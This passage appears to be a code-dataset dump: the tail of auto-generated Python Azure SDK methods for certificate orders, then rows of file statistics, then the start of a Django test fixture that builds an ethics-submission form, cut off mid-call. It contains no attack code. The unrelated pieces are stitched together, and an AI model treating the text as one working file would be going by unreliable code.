        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request (GET, no body)
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        # Any non-200 status surfaces as CloudError, tagged with the
        # service-side request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrder', response)

    if raw:
        # Caller asked for the transport-level response alongside the model.
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update_certificate_order(
        self, resource_group_name, name, certificate_distinguished_name, custom_headers=None, raw=False, **operation_config):
    """Create or update a certificate purchase order.

    Issues a PUT against the Microsoft.CertificateRegistration provider.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param certificate_distinguished_name: Distinguished name to be used
     for purchasing certificate
    :type certificate_distinguished_name: :class:`CertificateOrder
     <azure.mgmt.web.models.CertificateOrder>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: :class:`CertificateOrder
     <azure.mgmt.web.models.CertificateOrder>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Per-call correlation id so the service can trace this request.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct body
    body_content = self._serialize.body(certificate_distinguished_name, 'CertificateOrder')
    # Construct and send request
    request = self._client.put(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrder', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def delete_certificate_order(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Delete an existing certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct and send request
    request = self._client.delete(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        # Service returns an untyped JSON payload on delete; surfaced as-is.
        deserialized = self._deserialize('object', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def update_certificate_order(
        self, resource_group_name, name, certificate_distinguished_name, custom_headers=None, raw=False, **operation_config):
    """Update a certificate purchase order.

    NOTE(review): unlike create_or_update_certificate_order (PUT), this
    sends a PATCH to the same resource URL.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param certificate_distinguished_name: Distinguished name to be used
     for purchasing certificate
    :type certificate_distinguished_name: :class:`CertificateOrder
     <azure.mgmt.web.models.CertificateOrder>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: :class:`CertificateOrder
     <azure.mgmt.web.models.CertificateOrder>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct body
    body_content = self._serialize.body(certificate_distinguished_name, 'CertificateOrder')
    # Construct and send request
    request = self._client.patch(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('CertificateOrder', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def get_certificate_orders(
        self, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Get certificate orders in a resource group.

    Returns a lazily-evaluated paged collection; pages are fetched on
    iteration via the internal paging callback below.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrderPaged
     <azure.mgmt.web.models.CertificateOrderPaged>`
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def internal_paging(next_link=None, raw=False):
        # First page: build the full URL; subsequent pages follow the
        # server-supplied next_link verbatim (no extra query parameters).
        if not next_link:
            # Construct URL
            url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders'
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}
            query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        else:
            url = next_link
            query_parameters = {}
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(
            request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        return response
    # Deserialize response
    deserialized = models.CertificateOrderPaged(internal_paging, self._deserialize.dependencies)
    if raw:
        header_dict = {}
        client_raw_response = models.CertificateOrderPaged(internal_paging, self._deserialize.dependencies, header_dict)
        return client_raw_response
    return deserialized
def get_certificates(
        self, resource_group_name, certificate_order_name, custom_headers=None, raw=False, **operation_config):
    """List all certificates associated with a certificate order (only one
    certificate can be associated with an order at a time).

    Returns a lazily-evaluated paged collection; pages are fetched on
    iteration via the internal paging callback below.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param certificate_order_name: Certificate name
    :type certificate_order_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CertificateOrderCertificatePaged
     <azure.mgmt.web.models.CertificateOrderCertificatePaged>`
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def internal_paging(next_link=None, raw=False):
        # First page: build the full URL; subsequent pages follow the
        # server-supplied next_link verbatim.
        if not next_link:
            # Construct URL
            url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates'
            path_format_arguments = {
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)
            # Construct parameters
            query_parameters = {}
            query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        else:
            url = next_link
            query_parameters = {}
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(
            request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        return response
    # Deserialize response
    deserialized = models.CertificateOrderCertificatePaged(internal_paging, self._deserialize.dependencies)
    if raw:
        header_dict = {}
        client_raw_response = models.CertificateOrderCertificatePaged(internal_paging, self._deserialize.dependencies, header_dict)
        return client_raw_response
    return deserialized
def reissue_certificate_order(
        self, resource_group_name, name, reissue_certificate_order_request, custom_headers=None, raw=False, **operation_config):
    """Reissue an existing certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param reissue_certificate_order_request: Reissue parameters
    :type reissue_certificate_order_request:
     :class:`ReissueCertificateOrderRequest
     <azure.mgmt.web.models.ReissueCertificateOrderRequest>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/reissue'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct body
    body_content = self._serialize.body(reissue_certificate_order_request, 'ReissueCertificateOrderRequest')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def renew_certificate_order(
        self, resource_group_name, name, renew_certificate_order_request, custom_headers=None, raw=False, **operation_config):
    """Renew an existing certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate name
    :type name: str
    :param renew_certificate_order_request: Renew parameters
    :type renew_certificate_order_request:
     :class:`RenewCertificateOrderRequest
     <azure.mgmt.web.models.RenewCertificateOrderRequest>`
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/renew'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct body
    body_content = self._serialize.body(renew_certificate_order_request, 'RenewCertificateOrderRequest')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(
        request, header_parameters, body_content, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def retrieve_certificate_actions(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Retrieve the list of certificate actions.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate order name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list of :class:`CertificateOrderAction
     <azure.mgmt.web.models.CertificateOrderAction>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveCertificateActions'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        # '[CertificateOrderAction]' deserializes a JSON array into a list.
        deserialized = self._deserialize('[CertificateOrderAction]', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def retrieve_certificate_email_history(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Retrieve email history.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate order name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list of :class:`CertificateEmail
     <azure.mgmt.web.models.CertificateEmail>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveEmailHistory'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('[CertificateEmail]', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def resend_certificate_email(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Resend certificate email.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate order name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/resendEmail'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
def verify_domain_ownership(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Verify domain ownership for this certificate order.

    :param resource_group_name: Azure resource group name
    :type resource_group_name: str
    :param name: Certificate order name
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/verifyDomainOwnership'
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'name': self._serialize.url("name", name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
    # Construct headers
    header_parameters = {}
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
    # Construct and send request
    request = self._client.post(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)
    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('object', response)
    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response
    return deserialized
| 47.087832
| 188
| 0.674704
| 5,338
| 51,467
| 6.29674
| 0.038966
| 0.038379
| 0.048554
| 0.034273
| 0.943086
| 0.943086
| 0.943086
| 0.936392
| 0.934993
| 0.934993
| 0
| 0.003101
| 0.229331
| 51,467
| 1,092
| 189
| 47.130952
| 0.844317
| 0.268813
| 0
| 0.887067
| 0
| 0.007286
| 0.200113
| 0.122609
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034608
| false
| 0
| 0.007286
| 0
| 0.105647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
040b001f6d6083cf6e1cb1e63d77370e9a5f9702
| 16,966
|
py
|
Python
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 9
|
2017-02-13T18:17:13.000Z
|
2020-11-21T20:15:54.000Z
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 2
|
2021-05-20T14:26:47.000Z
|
2021-05-20T14:26:48.000Z
|
ecs/core/tests/test_submissions.py
|
programmierfabrik/ecs
|
2389a19453e21b2ea4e40b272552bcbd42b926a9
|
[
"Apache-2.0"
] | 4
|
2017-04-02T18:48:59.000Z
|
2021-11-23T15:40:35.000Z
|
import os
from django.utils import timezone
from ecs.core.models import Submission, SubmissionForm, EthicsCommission, Investigator
from ecs.documents.models import Document, DocumentType
from ecs.utils.testcases import EcsTestCase
from ecs.users.utils import get_or_create_user, create_user
TEST_PDF = os.path.join(os.path.dirname(__file__), 'data', 'menschenrechtserklaerung.pdf')
def attach_document(submission_form, filelike, name, doctype_identifier, mimetype='application/pdf', version="1", date=None):
    """Create a Document of the given type, store *filelike* as its payload,
    and link it to *submission_form*'s documents. Returns the new Document.
    *date* defaults to the current time when not supplied."""
    date = date or timezone.now()
    document = Document.objects.create(
        version=version,
        date=date,
        name=name,
        doctype=DocumentType.objects.get(identifier=doctype_identifier),
        mimetype=mimetype,
        parent_object=submission_form,
    )
    document.store(filelike)
    submission_form.documents.add(document)
    return document
def create_submission_form(ec_number=None, presenter=None):
    """Create and return a fully populated SubmissionForm test fixture.

    Creates a Submission (with *presenter* as both presenter and SuSAR
    presenter), fills in a complete example form, attaches the test PDF as
    protocol document, creates an EthicsCommission plus a main Investigator
    for the form and renders the form's PDF document.

    :param ec_number: optional EC number for the Submission
    :param presenter: optional presenter user; defaults to the
        'test_presenter@example.com' test user
    :return: the created SubmissionForm
    """
    presenter = presenter or get_or_create_user('test_presenter@example.com')[0]
    sub = Submission(ec_number=ec_number, presenter=presenter, susar_presenter=presenter)
    sub.save()
    sform = SubmissionForm.objects.create(
        submission = sub,
        # project identification
        project_title="High Risk Test Study",
        eudract_number="2010-002323-99",
        # sponsor contact data
        sponsor_name="testsponsor",
        sponsor_address="mainstreet 1",
        sponsor_zip_code="2323",
        sponsor_city="Wien",
        sponsor_phone="+4309876543456789",
        sponsor_fax="+430987654345678",
        sponsor_email="sponsor@example.com",
        # invoice recipient (intentionally left blank)
        invoice_name="",
        invoice_address="",
        invoice_zip_code="",
        invoice_city="",
        invoice_phone="",
        invoice_fax="",
        invoice_email="",
        invoice_uid="",
        # project type flags: only "non-registered drug" is set
        project_type_non_reg_drug=True,
        project_type_reg_drug=False,
        project_type_reg_drug_within_indication=False,
        project_type_reg_drug_not_within_indication=False,
        project_type_medical_method=False,
        project_type_medical_device=False,
        project_type_medical_device_with_ce=False,
        project_type_medical_device_without_ce=False,
        project_type_medical_device_performance_evaluation=False,
        project_type_basic_research=False,
        project_type_genetic_study=False,
        project_type_register=False,
        project_type_biobank=False,
        project_type_retrospective=False,
        project_type_questionnaire=False,
        project_type_education_context=None,
        project_type_misc=None,
        specialism="Pädiatrische Onkologie / Immunologie",
        pharma_checked_substance="",
        pharma_reference_substance="",
        medtech_checked_product="",
        medtech_reference_substance="",
        clinical_phase="III",
        already_voted=True,
        # study subjects
        subject_count=175,
        subject_minage=0,
        subject_maxage=21,
        subject_noncompetents=True,
        subject_males=True,
        subject_females=True,
        subject_childbearing=True,
        subject_duration="48 months",
        subject_duration_active="12 months",
        subject_duration_controls="36 months",
        subject_planned_total_duration="99",
        # pre-existing clinical tries of the substance
        substance_preexisting_clinical_tries=True,
        substance_p_c_t_phase="III",
        substance_p_c_t_period="to long",
        substance_p_c_t_application_type="IV in children",
        substance_p_c_t_gcp_rules=True,
        substance_p_c_t_final_report=True,
        # medtech data (blank: this is a drug study)
        medtech_product_name="",
        medtech_manufacturer="",
        medtech_certified_for_exact_indications=False,
        medtech_certified_for_other_indications=False,
        medtech_ce_symbol=False,
        medtech_manual_included=False,
        medtech_technical_safety_regulations="",
        medtech_departure_from_regulations="",
        # insurance
        insurance_name="Insurance",
        insurance_address="insurancestreet 1",
        insurance_phone="+43123456",
        insurance_contract_number="",
        insurance_validity="",
        additional_therapy_info="long blabla",
        # German-language free-text sections (placeholder text)
        german_project_title="bla bla bla",
        german_summary="bla bla bla",
        german_preclinical_results="bla bla bla",
        german_primary_hypothesis="bla bla bla",
        german_inclusion_exclusion_crit="bla bla bla",
        german_ethical_info="bla bla bla",
        german_protected_subjects_info="bla bla bla",
        german_recruitment_info="bla bla bla",
        german_consent_info="bla bla bla",
        german_risks_info="bla bla bla",
        german_benefits_info="bla bla bla",
        german_relationship_info="bla bla bla",
        german_concurrent_study_info="bla bla bla",
        german_sideeffects_info="bla bla bla",
        german_statistical_info="bla bla bla",
        german_dataprotection_info="bla bla bla",
        german_aftercare_info="bla bla bla",
        german_payment_info="bla bla bla",
        german_abort_info="bla bla bla",
        german_dataaccess_info="bla bla bla",
        german_financing_info="bla bla bla",
        german_additional_info="bla bla bla",
        # study plan / statistics
        study_plan_blind=0,
        study_plan_observer_blinded=False,
        study_plan_randomized=True,
